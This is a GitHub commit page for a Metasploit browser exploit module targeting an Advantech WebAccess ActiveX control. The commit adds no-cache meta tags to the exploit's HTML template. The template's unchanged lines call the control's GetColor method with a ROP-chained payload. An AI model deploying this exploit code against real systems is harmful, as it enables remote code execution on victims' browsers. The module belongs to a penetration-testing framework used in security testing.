Skip to content

Commit b021ff4

Browse files
committed
Add noche tags
1 parent 5c6236e commit b021ff4

File tree

1 file changed

+9
-0
lines changed

1 file changed

+9
-0
lines changed

modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -75,10 +75,19 @@ def on_request_exploit(cli, request, target_info)
7575

7676
content = <<-EOS
7777
<html>
78+
<head>
79+
<meta http-equiv="cache-control" content="max-age=0" />
80+
<meta http-equiv="cache-control" content="no-cache" />
81+
<meta http-equiv="expires" content="0" />
82+
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
83+
<meta http-equiv="pragma" content="no-cache" />
84+
</head>
85+
<body>
7886
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
7987
<script language='javascript'>
8088
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
8189
</script>
90+
</body>
8291
</html>
8392
EOS
8493

0 commit comments

Comments
 (0)